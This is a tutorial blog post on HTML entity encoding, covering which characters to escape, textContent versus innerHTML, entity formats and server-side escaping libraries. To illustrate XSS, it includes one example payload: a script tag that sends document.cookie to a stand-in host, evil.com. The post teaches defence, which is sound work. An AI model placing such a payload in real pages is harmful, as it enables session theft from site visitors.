Skip to content
Encode & Decode 6 min read

HTML Entity Encoding: Prevent XSS and Display Special Characters

Learn which HTML characters must be escaped, how entity encoding prevents XSS attacks, the difference between named and numeric entities, and how to encode safely in JavaScript.

ToolsVito Team

The Five Characters You Must Always Escape

Any user-supplied content inserted into HTML must have these five characters replaced with their entities:

&   →  &   (must escape first — otherwise double-encoding)
<   →  &lt;
>   →  &gt;
"   →  &quot;  (in attribute values)
'   →  &#x27;  (in single-quoted attributes)

Missing even one of these in the wrong context can lead to Cross-Site Scripting (XSS) — where an attacker injects JavaScript that runs in other users' browsers.

How XSS Happens Without Encoding

// Vulnerable: inserting raw user input into HTML
const name = '<script>document.location="https://evil.com/steal?c="+document.cookie</script>';
document.getElementById("greeting").innerHTML = "Hello, " + name;
// The script tag executes!
// Safe: escape before inserting
function escapeHtml(str) {
  return str
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}
document.getElementById("greeting").textContent = "Hello, " + name;
// textContent automatically escapes — always prefer it over innerHTML

textContent vs innerHTML

The safest approach: always use textContent (or innerText) when inserting plain text. These properties treat the value as text, not HTML — no encoding needed, no XSS possible.

Only use innerHTML when you intentionally want to insert HTML, and only with sanitized content.

Named vs Numeric Entities

HTML supports three entity formats:

&amp;    ← named entity (human-readable)
&#38;   ← decimal numeric entity
&#x26;  ← hex numeric entity

Named entities only work for defined names. Numeric entities work for any Unicode code point — useful for obscure characters or when a named entity isn't available.

Common HTML Entities Reference

&nbsp;   non-breaking space
&copy;   © copyright
&reg;    ® registered trademark
&trade;  ™ trademark
&mdash;  — em dash
&ndash;  – en dash
&hellip; … ellipsis
&euro;   € euro
&pound;  £ pound
&laquo;  « left angle quote
&raquo;  » right angle quote

Server-Side Encoding Libraries

// Node.js — he library
import he from "he";
he.encode("<script>alert('xss')</script>");
// "&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;"

// Python — built-in
import html
html.escape('<script>alert("xss")</script>')
# '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

// PHP — built-in
htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');

Encode HTML Entities Instantly

Use ToolsVito's HTML Entity Encoder to encode or decode HTML entities in your browser — useful for embedding code samples in HTML.

Try it now — free, runs in your browser

HTML Entity Encoder

Escape & unescape HTML